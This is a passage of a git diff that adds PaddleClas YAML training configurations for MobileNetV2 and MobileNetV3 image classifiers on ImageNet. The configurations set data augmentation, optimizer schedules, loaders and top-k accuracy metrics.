RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x1_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x1_5.yaml new file mode 100644 index 0000000..2ac0d69 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x1_5.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: 
./inference + +# model architecture +Arch: + name: MobileNetV2_x1_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git 
a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x2_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x2_0.yaml new file mode 100644 index 0000000..ca4bf66 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x2_0.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV2_x2_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: 
DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_35.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_35.yaml new file mode 100644 index 0000000..54ffaff --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_35.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_large_x0_35 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + 
size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_5.yaml new file mode 100644 index 0000000..61626e8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_5.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 
224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_large_x0_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] 
+ Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_75.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_75.yaml new file mode 100644 index 0000000..5b0b159 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_75.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_large_x0_75 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + 
scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x1_0.yaml new file mode 100644 index 0000000..56544d0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x1_0.yaml @@ -0,0 +1,131 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_large_x1_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.65 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: 
./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x1_25.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x1_25.yaml new file mode 100644 index 0000000..a0d6bf8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x1_25.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + 
eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_large_x1_25 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: 
'' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_35.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_35.yaml new file mode 100644 index 0000000..3525fa8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_35.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_small_x0_35 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt 
+ transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_5.yaml new file mode 100644 index 0000000..0156199 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_5.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_small_x0_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader 
for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_75.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_75.yaml new file mode 100644 index 0000000..058e81f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x0_75.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + 
checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_small_x0_75 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - 
NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x1_0.yaml new file mode 100644 index 0000000..df15f7a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x1_0.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_small_x1_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: 